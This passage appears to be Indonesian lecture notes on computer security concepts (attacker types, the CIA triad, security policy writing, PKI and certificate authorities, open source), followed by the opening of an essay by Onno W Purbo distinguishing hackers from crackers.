akan sekuriti mulai tampak dengan jelas. Banyak perusahaan yang awalnya
menganggap remeh masalah ini akhirnya mengalami kerugian yang besar akibat
kelalaian ini.
Sekuriti komputer juga sudah sering dimanfaatkan untuk sarana iklan yang
seringkali memakan korban akibat kurangya pemahaman pengguna. Pertama
adalah issue firewall, lalu sistem deteksi intrusi, kemudian Virtual Private
Network (VPN), dan yang sekarang sering digunakan dalam produk yang
berkaitan dengan sekuriti adalah Certificate Authority (CA) dan Public Key
Infrastructure (PKI). Sehingga sering digunakan sebagai peralatan marketing
yang berujung pada pernyataan untuk membujuk pembeli :
‘‘Bila anda membeli produk A maka anda akan aman’’.
Tetapi kenyataannya tak seindah itu, terutama dalam era Internet yang serba cepat
ini. (Schneier, 1999). Sekuriti terbentuk dari suatu mata rantai yang akan
memiliki kekuatan sama dengan mata rantai yang terlemah. Sistem sekuriti
berbasiskan CA akan memiliki rantai yang tak seluruhnya hanya merupakakn
sistem kriptografi. Manusia akan banyak terlibat,
Sekuriti komputer memiliki definisi yang beragam, sebagai contoh berikut ini
adalah definisi sekuriti komputer yang sering digunakan (Gollmann, 1999) :
Computer security deals with the prevention and detection of
unauthorized actions by users of a computer system.
Tetapi dengan makin pentingnya eCommerce dan Internet, maka masalah sekuriti
tidak lagi sekedar masalah keamanan data belaka. Berikut ini dikutipkan salah
satu pernyataan Erkki Liikanen Commissioner for Enterprise and Information
Society European Commission yang disampaikan pada Information Security
Solutions Europe (ISSE 99), Berlin 14 October 1999. Berikut ini adalah cuplikan
utama :
1. Security is the key to securing users trust and confidence, and thus to
ensuring the further take-up of the Internet. This can only be achieved if
security features are incorporated in Internet services and if users have
sufficient safety guarantees
2. Securing the Internal Market is crucial to the further development of the
European security market, and thus of the European cryptographic
industry.This requires an evolution of mentalities: Regulation in this field
transcends national borders. Let’s "think European".
3. European governments and the Commission now have a converging view
on confidentiality. We see this in Council, in Member State policies and in
the constructive discussions we have. We must take this debate further and
focus of the potential of encryption to protect public security rather than
mainly seeing it as a threat to public order.
4. Finally, the promotion of open source systems in conjunction with
technology development is certainly one important step towards unlocking
the potential of the desktop security market for the European cryptographic
industry.
Jadi masalah sekuriti pada infrastruktur eCommerce dan Internet tidak saja
terletak pada masalah teknologi dan ekonomi saja, tetapi juga menyangkut
dengan keamanan suatu negara atau ketergantungan negara terhadap negara lain.
Bukan saja sistem sekuriti dengan teknologi yang aman, tetapi juga pertimbangan
bahwa pemanfaatan suatu teknologi tidak dibatasi oleh negera lain. Sebagai
contoh USA dengan ITAR-nya membatasi pemanfaatan jenis teknologi
kriptografi tertentu.
Pada prakteknya suatu pembentukan sistem yang aman akan mencoba melindungi
adanya beberapa kemungkinan serangan yang dapat dilakukan pihak lain
terhadap kita antara lain :
Intrusion. Pada penyerangan ini seorang penyerang akan dapat
menggunakan sistem komputer yang kita miliki. Sebagian penyerang jenis
ini menginginkan akses sebagaimana halnya pengguna yang memiliki hak
untuk mengakses sisttem.
Denial of services. Penyerangan jenis ini mengakibatkan pengguna yang
sah tak dapat mengakses sistem. Sebagai contoh adalah Distributed Denial
of Services (DDOS) yang mengakibatkan beberapa situs Internet tak bisa
diakses. Seringkali orang melupakan jenis serangan ini dan hanya
berkonsentrasi pada intrusion saja.
Joyrider. Pada serangan ini disebabkan oleh orang yang merasa iseng dan
ingin memperoleh kesenangan dengan cara menyerang suatu sistem.
Mereka masuk ke sistem karena beranggapan bahwa mungkin data yang di
dalamnya menarik. Rata-rata mereka karena rasa ingin tahu, tapi ada juga
yang menyebabkan kerusakan atau kehilangan data.
Vandal. Jenis serangan ini bertujuan untuk merusak sistem. Seringkali
ditujukan untuk site-site besar.
Scorekeeper. jenis serangan in hanyalah bertujuan untuk mendapatkan
reputasi dengan cara mengcrack sistem sebanyak mungkin. Sebagian besar
dari mereka tertarik pada situs-situs tertentu saja. Sebagian dari mereka tak
begitu peduli dengan data yang ada di dalamnya. Saat ini jenis ini lebih
dikenal dengan istilah script kiddies
Mata-mata. Jenis serangan ini bertujuan untuk memperoleh data atau
informasi rahasia dari pihak kompetitor. Saat ini semakin banyak
perusahaan yang memanfaatkan jasa ini.
Untuk menerapkan sekuriti, berbagai pihak pada dasarnya menggunakan
pendekatan berikut ini :
Tanpa sekuriti. Banyak orang tidak melakukan apa-apa yang berkaitan
dengan sekuriti, dengan kata lain hanya menerapkan sekuriti minimal (out
of the box, by default) yang disediakan oleh vendor. Jelas hal ini kuranglah
baik.
‘‘Security through obscurity’’ (security dengan cara penyembunyian) Pada
pendekatan ini sistem diasumsikan akan lebih aman bila tak ada orang yang
tahu mengenai sistem itu, misal keberadaannya, isinya, dan sebagainya.
Sayangnya hal tersebut kurang berarti di Internet, sekali suatu situs
terkoneksi ke Internet dengan cepat keberadaanya segera diketahui. Ada
juga yang berkeyakinan bahwa dengan menggunakan sistem yan tak
diketahui oleh umum maka dia akan memperoleh sistem yang lebih aman.
Host security. Pada pendekatan ini, maka tiap host pada sistem akan dibuat
secure. Permasalahan dari pendekatan ini adalah kompleksitas. Saat ini
relatif pada suatu organisasi besar memiliki sistem ang heterogen. Sehingga
proses menjadikan tiap host menjadi secure sangatlah kompleks.
Pendekatan ini cocok untuk kantor yang memiliki jumlah host yang sedikit.
Network security. Ketika sistem bertambah besar, maka menjaga
keamanan dengan memeriksa host demi host yang ada di sistem menjadi
tidak praktis. Dengan pendekatan sekuriti jaringan, maka usaha
dikonsentrasikan dengan mengontrol akses ke jaringan pada sistem.
Tetapi dengan bertambah besar dan terdistribusinya sistem komputer yang
dimiliki suatu organisasi maka pendekatan tersebut tidaklah mencukupi. Sehingga
perlu digunakan pendekatan sistem sekuriti yang berlapis. Yang perlu diingat,
adalah kenyataan bahwa tak ada satu model pun yang dapat memenuhi semua
kebutuhan dari sekuriti sistem yang kita inginkan. Sehingga kombinasi dari
berbagi pendekatan perlu dilakukan.
2. CIA dan 3M
Perlindungan data adalah hal yang penting dalam masalah sekuriti. Pada bahasan
sekuriti data didefinisikan sebagai :
Phsical phenomena chosen by convention to represent certain aspects
of our conceptual and real world. The meanings we assign to data are
called information. Data is used to transmit and store information
and to derive new information by manipulating the data according to
formal rules
Dengan definisi di atas, maka data dianggap merepresentasikan informasi. Pada
bahasan sistem sekuriti data dapat dikategorikan menjadi
Data publik, yaitu data yang dapat dikomunikasikan dengan siapa saja
Data rahasia, yaitu data yang tak boleh bocor ke tangan yang tak berhak
Sebarang data
Seringkali orang sering mempertimbangkan masalah akses yang tidak sah saja
dalam sekuriti. Sebetulnya hal yang perlu dipertimbangkan adalah lebih luas.
Dalam perancangan dan pembahasan sistem sekuriti kazimnya kita akan
dihadapkan pada pertimbangan yang dikenal dengan istilah segitiga CIA
Confidentiality, yang akan berkaitan dengan pencegahan akan
pengaksesan terjadap informasi yang dilakukan oleh pihak yang tak berhak.
Integrity. yang akan berkaitan dengan pencegahan akan modifikasi
informasi yang dilakukan oleh pihak yang tak berhak.
Availability, pencegahan akan penguasaan informasi atau sumber daya
oleh pihak yang tak berhak.
Disain suatu sistem sekuriti akan mencoba menyeimbangkan ke tiga hal di atas.
Confidentiality akan berkaitan dengan privacy (data personal) dan secrecy
(kerahasiaan). Privacy lebih berkaitan dengan data pribadi, sedang secrecy
terhadap data yang dimiliki oleh suatu organisasi. Kerahasiaan dan keamanan
saling berhubungan.
Secara umum integrity berkaitan dengan jaminan bahwa sesuatu berada dalam
kondisi seharusnya. Pada sekuriti ini akan berkaitan dengan proses pengubahan
data. Integrity didefinisikan oleh Clark and Wilson adalah :
No user of the system, even if authorized, may be permitted to modify
data items in such a way that asses or a accounting records of the
company are lost or corrupted.
Dalam Orange Book ( panduan untuk evaluasi sekuriti) didefinisikan data
integrity adalah :
The state that exists when computerized data is the same as that in the
source documents and has not been exposed to accidental or
malicious alteration or destruction.
Dalam hal ini jelas bahwa integrity berkaitan dengan konsistensi eksternal. Suatu
data yang disimpan dalam sistem komputer harus benar menggambarkan realita
yang ada di luar sistem komputer. Sedangkan dalam hal communication security,
integrity sendiri memiliki definsi sebagai :
The detection and correction of modification, insertion, deletion or
replay of transmitted data including both intentional manipulations
and random transmission errors.
Sedangkan availability didefinisikan oleh ISO 7498-2 adalah :
The property of being accessbile and useable upan demand by an
authorized entity.
Salah satu kasus yang sering terjadi pada aspek ini adalah adanya Denial of
Service, yang didefinisikan sebagia :
The prevention of authorized access to resources or the delaying the
time-critical operations.
Setiap user harus bertanggung jawab terhadap aksi yang dilakukan pada sistem .
Untuk itulah konsep accountability menjadi penting pada sistem komputer.
Accountability :
Audit information must be selectively kept and protected so that
action affecting security can be traced to the responsible party
Pada hakekatnya seringkali orang melupakan bahwa dalam pelaksanaan sekuriti
akan melibatkan 3 M yaitu :
Matematika
Manajemen
Manusia
Berikut ini akan dibahas lebih dalam mengenai pertimbangan tersebut.
2.1 Matematika
Since mathematics is the foundation of all digital advances, nations
well versed in that discipline - including China, India and the nations
of Southeast Asia - could turn their homelands into formidable
technology power
Pada penyusunan suatu sistem sekuriti tidak terlepas dari kebutuhan pemahaman
matematis yang mendasari penyusunan algoritma yang nantinya
diimplementasikan baik dalam bentuk perangkat keras ataupun lunak. Beberapa
konsep matematika yang sering dimanfaatkan misal :
Number theory, mendasari berbagai algoritma kriptografi seperti DES,
RSA dan lain sebagianya.
Formal model, digunakan untuk melakukan pengujian apakah suatu
protokol dapat dijamin keamanannya. Pengembangan dari berbagai jenis
kalkulus sepertri SPI Calculus (Abadi dan Gordon, 1999) lazim digunakan
untuk menganalisis suatu protokol yang digunakan untuk sekuriti. Metoda
formal matematis ini sering digunakan secara formal untuk membuktikan
celah yang ada pada protokol SSL (Abadi dan Needham, 1996), SSH dan
AKA (Abadi, 1997).
Beberapa model matematika untuk sekuriti telah dikembangkan antara lain :
Model Bell-LaPadula (BLP)
Model Harrison-Ruzzo-Ullman (HRU)
Model Chinesse Wall
Model Biba
Model Clark Wilson
Sistem kriptografi simetris menggunakan key yang sama baik untuk pengirim
data ataupun penerima data. Algoritma yang dikenal adalah DES, Blowfish.
Sistem kriptografi asimetris menggunakan dua buah key, yaitu public key dan
private key. Salah satu key akan diberi tahu kepada publik.
Matematika merupakan perangkat bantu analisis dalam masalah sekuriti. Sebagai
contoh berikut ini adalah penulisan protokol SSL yang memungkinkan pertukaran
session key antara Web server dan client.
2.2. Manajemen
The technology, however is only a tool.. it cannot solve social and
economic problem in the absence of social and economic policy.....
Technology cannot balance the budget, although with creative
thinking it can be used to improve the efficiency of government and
minimize the cost
Daniel Burnstein dan David Kline dalam Road Warrior
Pada dasarnya untuk membuat suatu sistem yang secure tidak lepas dari
bagaimana kita mengelola suatu sistem dengan baik. Sehingga persyaratan good
practice standard seperti Standard Operating Procedure (SOP) dan Security
Policy haruslah diterapkan di samping memikirkan hal teknologinya.
Suatu security policy sebaiknya berisi :
Penjelasan. Suatu kebijakan haruslah eksplisit dan jelas dipahami dan
menerangkan mengapa kebijakan tersebut diterapkan. Karena sebagian
besar orang cenderung tak mengikuti aturan bila tak diberikan alasannya.
Tanggung jawab tiap pihak yang terlibat Suatu kebijakan memaparkan
secara eksplist harapan dan tanggung jawab setiap pihak, pengguna,
pengelola dan pihak manajemen. Dengan cara ini dihindari harapan serta
melepaskan tanggung jawab pada pihak lain.
Bahasa yang biasa. Karena yang membaca dokumen ini adalah semua
pengguna, maka kebijakan harus ditulis dengan bahasa yang dipahami oleh
semua kalangan.
Otoritas yang menerapkan. Harus juga ditentukan tindakan yang perlu
dilakukan bila terjadi pihak yang tak mematuhi kebijakan tersebut.
Kebijakan juga harus menentukan siapa yang akan memutuskan mengenai
keputusan hukuman ketika terjadi pelanggaran.
Perkecualian. Tak ada kebijakan yang sempurna, terutama untuk
perubahan di masa mendatang. Sehingga perlu dilakukan penentuan
bilamana diperlukan suatu pengecualian. Siapa dan bagaimana yang
mendapat pengecualian tersebut.
Penilaian ulang. Karena sistem terus berevolusi, maka kebijakan perlu juga
direvisi pada masa mendatang. Sebagai contoh perubahan ukuran organisasi
(orang yang terlibat) akan menyebabkan perubahan policy ini juga.
Sebaiknya security policy TIDAK berisi hal berikuti ini :
Ditail teknis. Karena suatu kebijakan haryus menjelaskan apa yang akan
dilindungi dan mengapa, maka tidak perlu ditail teknis tentang bagaimana
melakukan hal tersebut dijabarkan. Akan lebih bermanfaat menuliskan
dokumen pendek yang dapat dipahami semua pihak daripada dokumen
panjang yang bersifat teknis yang hanya dipahami oleh bagiam teknis saja.
Permasalahan pihak lain. Setiap situs memiliki kebijakan yang berbeda
karena perbedaan contraint, pengguna, dan juga kemampuan. Kebijakan ini
juga berubah sejalan dengan waktu. Sehingga janganlah selalu sekedar
mengikuti kebijakan yang dilakukan oleh pihak lain belaka dalam membuat policy ini.
Masalah yang bukan merupakan masalah sekuriti komputer.
Seringkali permasalahan non sekuriti dianggap permasalahan sekuriti,
sebagi contoh pengguna menampilkan gambar porno (ini permasalahan
sumber daya manusia). Pengguna bermain game sepanjang hari juga bukan
masalah sekuriti (kecuali game tertentu yang memanfaatkan jaringan).
Sehingga batasan mana yang merupakan permasalah sekurit dan mana yang
bukan harus cukup dijelaskan.
Berikut ini adalah contoh suatu policy yang kurang cocok (sengaja ditulis dalam
kutipan aslinya) :
OTP will be used for all incoming connections
Policy di atas terlalu spesifik dan teknis, sehingga sulit untuk dipahami, sehingga
seringkali tak diterapkan. Berikut ini adalah perbaikan :
Nonreusable passwords shall be used to authenticate all incoming
connections from the outside world, in order to prevent potential
attackers from being able to capture reusable passwords by
monitoring such connections.
Policy di atas sudah lebih baik karena telah menjelaskan APA yang harus
dilindungi, dan MENGAPA. Policy tersebut tetap memberikan opsi terbuka
BAGAIMANA hal tersebut diimplementasikan, sehingga staf teknis dapat
memilih implementasi yang terbaik. Policy di atas dapat ditulis lebih baik
menjadi :
Regular passwords are often stolen and reused when they pass across
networks. We won’t use passwords that can be reused across
networks our company doesn’t control.
Policy hanya memberikan panduan dalam implementasi tapi tak menjelaskan
secara speisifik implementasi yang dilakukan.
Sangat sulit untuk menentukan suatu guideline seragam yang berkaitan dengan
sekuritini ini. Hal ini juga disebabkan oleh beragamnya bentuk organisasi yang
memanfaatkan IT. Akan tetapi berikut ini diberikan beberapa hal mendasar yang
sebaiknya disertakan dalam penulisan kebijakan sekuriti (security policy) :
Siapa saja yang diperkenankan memiliki account pada situs anda ? Apakah
ada account untuk guest ? Bagaimana dengan kontraktor, vendor dan client
yang terlibat dengan sistem anda ?
Apakah sebuah account dapat digunakan bersama oleh beberapa pengguna
? Bagaimana dengan sekretaris yang menggunakan account seorang
eksekutif untuk membaca emailnya ? Bagaimana dengan proyek bersama ?
Apakah penggunaan suatu workstation sebentar tergolong pemakaian
account bersama ?
Kapan seseorang dapat kehilangan hak atas accountnya, dan apa yang
dilakukan ?
Siapa yang dapat menggunakan modem dial in ? Apakah ada pertimbangan
khusus untuk line SLIP, PPP, atau ISDN ?
Apa yang harus dilakukan orang sebelum menghubungkan komputernya ke
jaringan utama ?
Bagaimana membuat komputer cukup aman sebelum komputer tersebut
memperoleh layanan dari mesin utama ?
Bagaimana membuat komputer aman agar dapat dikoneksikan jaringan
dengan akses tak terproteksi ke Internet
Bagimana data keuangan harus dilindungi ?
Bagimana informasi rahasia mengenai pegawai dilindungi ? Bagaimana
dengan kantor di negara lain yang berada di bawah hukum yang berbeda ?
Apakah yang perlu dilakukan oleh tiap orang untuk melindungi sistemnya ?
Bagaimana model password yang harus digunakan dan bagaimana proses
penggantiannya ?
Apakah tindakan pencegahan yang perlu dilakukan terhadap virus ?
Siapa yang dapat melakukan koneksi ke network eksternal ? Bagaimana
definisi network eksternal ini ? Apakah diperbolehkan seorang manajer
proyek menghubungkan network internal dengan situs lainnya ? Bagaimana
dengan koneksi dari partner bisnis ? Bagaimana koneksi lainnya ke Internet
?
Bagaimana komputer di rumah diamankan ? Bagaimana komputer tersebut
memperoleh akses yang aman ke jaringan kantor ?
Bagaimana pegawai yang sedang dalam perjalanan memperoleh akses yang
aman ke jaringan kantor ?
Informasi manakah yang tergolong informasi rahasia bagi suatu perusahaan
? Bagaimana informasi tersebut dilindungi ? Apakah boleh informasi
tersebut dikirm ke luar melalui e-mail ?
Apakah persyaratan untuk suatu sistem agar dapat melakukan electronic
commerce ?
Jika suatu kantor memiliki situs remote, bagaimana dibuat akses yang aman
ke jaringan utama di kantor pusat ?
Dalam mendisain sekuriti dapat dipakai 5 tahapan dasar berikut ini :
1. Pada aplikasi yang bersangkutan, manakah mekanisme proteksi difokuskan,
apakah pada data, operasi, atau pengguna
2. Pada layer manakah dari sistem komputer mekanisme sekuriti akan
ditempatkan ?
3. Mana yang lebih diinginkan kesederhanaan dan jaminan tinggi atau pada
sistem yang memiliki feature yang kaya.
4. Apakah tugas untuk mendefinisikan dan mengerapkan security harus
diberikan pada badan terpusat atau diberikan pada masing-masing individu
pada suatu sistem ?
5. Bagaimana dapat melindungi dari penyerang yang ingin meperoleh akses
pada sistem yang dilindungi mekanisme proteksi ?
2.3 Manusia
... we can make machines smarter and smarter, but their value will be
in how much smarter they make people
Doug Engelbart dalam Dr Dobb Journal
Manusia adalah salah satu faktor yang sangat penting tetap sering kali dilupakan
dalam pengembangan Teknologi Informasi. Begitu juga dalam mengembangkan
sistem sekuriti. Sebagai contoh karena penggunaan password yang sulit sehingga
menyebabkan pengguna malah menuliskannya pada kertas yang ditempel dekat
komputer. Sehingga dalam menyusun kebijakan sekuriti faktor manusia dan
budaya setempat haruslah sangat dipertimbangkan.
Seperti yang diungkapkan oleh Kevin Mitnick (seorang cracker yang terkenal),
sebagian besar celah diperoleh melalui rekayasa sosial yang menunjukkan
kelemahan pengguna. Saat ini di Indonesia masih banyak praktek dari pengguna
yang sangat mengabaikan faktor sekuriti (bahkan di bank pun masih
berlangsung). Banyak pengguna komputer yang tergolong sensitif (misal Bank)
saling menukar password, bahkan sering menuliskan password dan menempel di
dekat monitornya. Salah satu serangan yang sering dilakukan terhadap
kelengahan pengguna adalah kasus ‘‘impersonate’’ pada Internet Banking.
Komunitas internet yang tadinya merupakan komunitas sejenis (para ilmuwan)
yang berdasarkan rasa percaya dan keinginan berkolaborasi, kini menjadi
komunitas yang majemuk, dan penuh dengan orang asing. Sehingga mirip dengan
jalanan yang rawan akan tindak kejahatan. Hukum (apalagi di Indonesia)
sepertinya belum bisa mengikuti kecepatan perubahan internet. Sehingga langkah
paling tepat untuk melindungi sistem, adalah dari diri pengguna sendiri. Baik
secara aktif menjaga pesan yang dikirimkan, teliti dalam menerima pesan,
maupun berhati-hati dalam menggunakan fasilitas atau jasa di internet. Kasus
virus-worm seperti I LOVE U yang mengirimkan pesan seakan-akan dari
pengguna dengan tujuan yang ada di address book pengguna, sudah merupakan
suatu contoh nyata begitu mudahnya kasus pelanggaran keamanan dan pencurian
identitas dilakukan. Ini juga berawal dari ketakpedulian pengguna terhadap
permasalahan ini.
Sistem komputer client yang digunakan pengguna saat ini sering tidak dianggap
sebagai sumber kelemahan sistem sekuriti. Padahal ini salah satu penyebab
beberapa kasus keamanan. Untuk beberapa sistem yang mensyaratkan keamanan
(misal perbankan, data organisasi) maka perlu digunakan client yang memiliki
sistem log dan multi user yang baik. Sehinga accountibility dari tiap pengguna
akan tetap terjaga.
Pada dasarnya seorang pengguna memiliki tanggung jawab penggunaan sumber
daya komputasinya. Tanggung jawab ini berdasarkan konvensi yang berupa
(Ladkin, 1999) :
Legal, sebagai contoh tak mengancam orang lain, tak menyaru sebagai
orang lain, jangan merusak pekerjaan orang lain
Kontraktual, sebagai contoh tak bermain game, tak menulis email pribadi,
menjaga kontrak bisnis tetap bersifat rahasia.
Sosial, tak menunjukkan gambar porno, atau tak membaca email milik
orang lain.
3. PKI dan CA
Modern society is imposed not by the personal presence and brute
force of an elite caste but by the way each individual learns the art of
self-surveilance
Michel Foucault
Berikut ini akan dijelaskan secara singkat konsep dan prinsip dari Public Key
Infrastructure (PKI) serta peran Certificate Authority (CA).
3.1 Public Key Infrastructure
Perdagangan tradisional berbasiskan kertas dan ‘‘trust’’. Dalam perkembangan
perdagangan tradisional telah dikenal sistem EDI yang bersifat : secure, closed,
dan menggunakan sistem yang proprietary. Sedangkan saat ini eCommerce yang
menggunakan Internet relatif bersifat tak aman, open dan memanfaatkan open
system.
Di dunia Internet relatif sulit sekali memastikan apakah seseorang itu benar
personal yang dimaksud. Sehingga timbul permasalahan mendasar dalam
pemanfaatan eCommerce.
Authentication : untuk mengidentifikasi pihak yang terlibat. Dalam
perdagangan tradisional hal tersebut dilakukan dengan surat yang
ditanda-tangani.
Confidentiality : untuk menjaga informasi agar tetap privat. Dalam
perdagangan tradisional surat ditulis dalam amplop dan lalu ditanda-tangani
lalu di-‘‘seal’’.
Integrity: untuk melindungi manipulasi informasi. Hal ini dilakukan
pengiriman dengan surat tercatat, lalu dibuat salinannya dan dikirimkan dua
kali.
Non repudiation : untuk mencegah pengingkaran informasi oleh pemilik.
Hal ini dapat dilakukan dengan adanya saksi yang menguji keabsahan tanda
tangan tersebut.
Agar hal tersebut dapat tercapai dalam eCommerce maka perlu diterapkan
langkah-langkah :
Kriptografi standard (simetrik dan asimetrik). Kriptografi simetrik cepat,
aman tetapi memiliki permasalahan pengelolaan key. Asimetrik kriptografi
digunakan dalam public key kriptografi. Ada 2 key, private dan public key.
Private key disimpan sendiri, dan publik key didistribusikan. Bila publik
key digunakan untuk menenkripsi maka hanya private key yang dapat
mendekripsi. Begitu juga sebaliknya.
One way hashing. Menggunakan fungsi satu arah, dan tanpa key.
Digunakan untuk menghasilkan suatu sidik data khas terhadap suatu
kumpulan data. Digunakan untuk menentukan apakah suatu data telah
berubah.
Tanda tangan digital. Beberapa negara telah mensahkan penggunaan
tanda tangan digital dalam transaksi elektronis. Tanda tangan digital ini
akan menjamin otentikasi suatu dokumen.
Certificate Authority. Suatu sistem yang mengikat kepemilikan public key
dan pengguna sesungguhnya.
Langkah di atas dapat digunakan untuk membentuk ‘‘trust’’ dalam transaksi di
Internet :
Authentication : publik key digunakan untuk membuat digest dari pesan.
Hanya dengan menggunakan private key dari pengirim maka dapat
didekrip.
Confidentiality : Pesan dienkripsi dengan menggunakan publik key dari
penerima. Hanya dengan menggunakan private key dari pengirim pesan
dapat didekripsi.
Integrity: Membandingkan digest dengan tanda tangan digital yang
didekripsi.
Non repudiation : tanda tangan digital melakukan hal ini.
Key yang digunakan pada sistem kriptografi memegang peran yang sangat
penting.
Pseudo random number
Panjangnya key, semakin panjang semakin aman. Tetapi perlu diingat
bahwa membandingkan dua buah sistem kriptografi yang berbeda dengan
berdasarkan panjang keynya saja tidaklah cukup.
Private key harus disimpan secara aman baik dalam file (dengan PIN atau
passphrase) atau dengan smart card.
3.2 Certificate Authority
Does the fact that he sends out the correct answers to the questions
prove that he understands Chinese ?
John Searle mengenai Chinese Room Experiment
Penggunaan public key memang akan memudah proses manajemen key yang
digunakan dalam suatu eCommerce. Tetapi bagaimana mengetahui suatu publik
key adalah milik seseorang ? Untuk itu akan dimanfaatkan digital signature dan
Certifcate Authority (CA).
Suatu fungsi hash pada dasarnya adalah suatu fungsi sederhana yang tak bersifat
reversibel. Sehingga dengan mudah kita dapat menghasilkan suatu ‘‘signature’’
yang khas untuk tiap deretan data. Tetapi dari signature tersebut tak dapat
dilakukan pembalikan untuk memperoleh deretan data asli.
Suatu CA akan mengikat (bind) suatu publik key dengan pemiliknya. Melakukan
penyampulan untuk mendistribusikan publik key. CA yang dipercaya akan
melakukan tanda tangan digital untuk menguji kepemilikan kunci tersebut. Suatu
Certificate pada dasarnya akan berisi :
Keterangan ditail tentang pemilik
Keterangan tentang pihak yang mengeluarkan sertifikat (Certifier)
Publik key itu sendiri
Tanggal valid dan kedaluarsa
Tanda tangan digital sertifikat tersebut yang dilakukan oleh CA
Time stamp (penanda waktu)
Suatu CA akan melakukan beberapa hal mendasar :
Membuat sertifikat
Bertanggung jawab memvalidasi pemilik dari suatu public key.
Mendistribuskan CA dengan direktori server
Membuat Certification Revocation List (CRL)
Biasanya CA disediakan oleh suatu institusi yang dipercaya oleh publik, misal
suatu institusi pemerintah. Suatu Public Key Infrastructure akan terdiri dari :
Certification Authority (CA)
Registratraion Authority (RA)
Direktori
Aplikasi yang mendukung PKI !!!!!
Prosedur dan policy
Yang perlu dipahami adalah kenyataan bahwa biasanya dalam penyusunan PKI
maka akan melibatkan 20% teknologi dan 80% policy . PKI adalah salah satu
infrastructure eCommerce yang penting.
4. Open Source dan Security
Over the next decade the development of application software will
shift from the technological elite to the software proletariat
Scott Brown dalam The Future of Software
Dengan tersedianya source code para open source sering pihak merasa ragu akan
keamanan sistem tersebut. Sudah barang tentu pendekatan dengan konsep
security through obscurity ini kurang tepat. Pada saat ini Open Source merupakan
salah satu kandidat untuk penyediaan infrastruktur sistem yang aman. Tidak saja
aman dari sisi teknologi tapi juga dari sudut pandang ketergantungan suatu
negara. Beberapa negara di Eropa telah memutuskan pemanfaatan Open Source
dalam pembentukan infrastruktur eCommerce mereka.
Pemerintah Jerman melalui Bundesminister für Wirtschaft und Technologi
( BMWi ). menyatakan bahwa selama ini pengembangan infrastruktur Internet
sering dilakukan dengan menggunakan pendekatan security through obscurity.
Sehingga banyak orang menutup mata terhadap resiko yang mungkin terjadi pada
sistem operasi yang dominan. Berdasarkan alasan inilah maka BMWi mendukung
pengembangan Open Source, karena menjanjikan keamanan yang lebih baik.
Paling tidak memungkinkan para ekspert di luar perusahaan penyedia sistem
tersebut untuk memeriksa secara lebih seksama dan menyeluruh.
BMWi sejak tahun 1999 telah mulai mengembangkan komponen untuk sistem
sekuriti dengan perangkat lunak Open Source. Di samping itu, BMWi
menganggap Open Source menawarkan solusi yang lebih aman, lebih user
friendly dan inovasi yang lebih baik serta interoperabilitas yang baik dengan
produk lain. Dengan ketersediaan source code maka diharapkan para developer di
Jerman dapat bekerja lebih cepat tanpa bergantung pada vendor negara lain. Saat
ini telah banyak developer Open Source yang berasal dari Jerman. Menurut
perkiraan BMWi, Jerman pada tahun 2000 akan menghabiskan sekitar 200
milliard DM untuk kebutuhan komputer sehingga langkah-langkah penghematan
seperti penggunaan Open Source dan teknologi baru perlu dilakukan. Dukungan
pemerintah Jerman terhadap Open Source memang sungguh-sungguh tercermin
pada studi yang dilakukan der Koordinierungs- und Beratungsstelle der
Bundesregierung für Informationstechnik in der Bundesverwaltung (KBSt), yang
menyarankan penggunaan perangkat lunak Open Source di lingkungan
kementerian dalam negeri Jerman. Hal ini juga didukung oleh kajian Institut für
Rechtsfragen der Open Source Software suatu LSM yang memfokuskan pada
aspek hukum dari Open Source. Hal ini tak mengherankan sebab sejalan dengan
yang diutarakan oleh Erkki Liikanen - Commissioner for Enterprise and
Information Society European Commission yang disampaikan pada Information
Security Solutions Europe (ISSE 99), bahwa berdasarkan alasan keamanan dan
menghindari ketergantungan pada negara lain, maka sangat penting
mempertimbangkan penggunaan Open Source dalam teknologi kriptografi.
Negara-negara Eropa telah juga mengembangkan proyek yang dikenal dengan
nama Interworking Public Key Infrastructure for Europe. Proyek ini juga
berusaha mengembangkan teknologinya dengan pendekatan Open Source.
Dengan telah diakuinya secara hukum tanda tangan digital ini, maka sudah
saatnya Indonesia mempertimbangkan pembangunan PKi yang
mempertimbangkan aspek non teknis dan teknis secara lebih seksama.
Masyarakat Underground Dunia Maya
Onno W Purbo onno@indo.net.id
Masyarakat Underground? Bawah tanah? … Betul, masyarakat yang tidak terlihat, tidak terdeteksi, seperti siluman, mereka hidup & berjaya di dunia maya – tanpa terdeteksi oleh pengguna Internet biasa, tak terdeteksi oleh sistem administrator WARNET & ISP.Siapakah mereka? – mereka adalah para hacker. Media & stereotype masyarakat membentuk karakter hacker sebagai orang jahat dan suka merusak. Stereotype ABG 15-20 tahun-an, yang duduk di belakang komputer berjam-jam, masuk ke sistem dan men-delete, berbelanja menggunakan kartu kredit curian atau menghancurkan apa saja yang bisa mereka hancurkan – “anak” ini dikenal sebagai cracker bukan sebagai hacker. Cracker ini yang sering anda dengar di berita / media, mematikan situs web, menghapus data dan membuat kekacauan kemanapun mereka pergi. Hacker yang betul sebenarnya tidak seperti yang ada dalam stereotype banyak orang di atas.
Di dunia elektronik underground nama jelas & nama lengkap tidak digunakan. Orang biasanya menggunakan nama alias, callsign atau nama samaran. Hal ini memungkinkan kita bisa menyamarkan identitas, dan hanya di kenali sesama underground. Beberapa nama diantara hacker Indonesia bisa dikenali seperti hC, cbug, litherr, fwerd, d_ajax, r3dshadow, cwarrior, ladybug, chiko, gelo, BigDaddy dsb..
Apakah perbedaan mendasar antara seorang cracker & hacker? Di http://www.whatis.com, cracker di definisikan sebagai “seseorang yang masuk ke sistem orang lain, biasanya di jaringan komputer, membypass password atau lisensi program komputer, atau secara sengaja melawan keamanan komputer. Cracker dapat mengerjakan hal ini untuk keuntungan, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem”
Berbeda dengan Cracker, Hacker menurut Eric Raymond di definisikan sebagai programmer yang pandai. Sebuah hack yang baik adalah solusi yang cantik kepada masalah programming dan “hacking” adalah proses pembuatan-nya. Ada beberapa karakteristik yang menandakan seseorang adalah hacker, seperti (1) dia suka belajar detail dari bahasa pemrograman atau system, (2) dia melakukan pemrograman tidak cuma berteori saja, (3) dia bisa menghargai, menikmati hasil hacking orang lain, (4) dia dapat secara cepat belajar pemrogramman, dan (5) dia ahli dalam bahasa pemrograman tertentu atau sistem tertentu, seperti “UNIX hacker”.
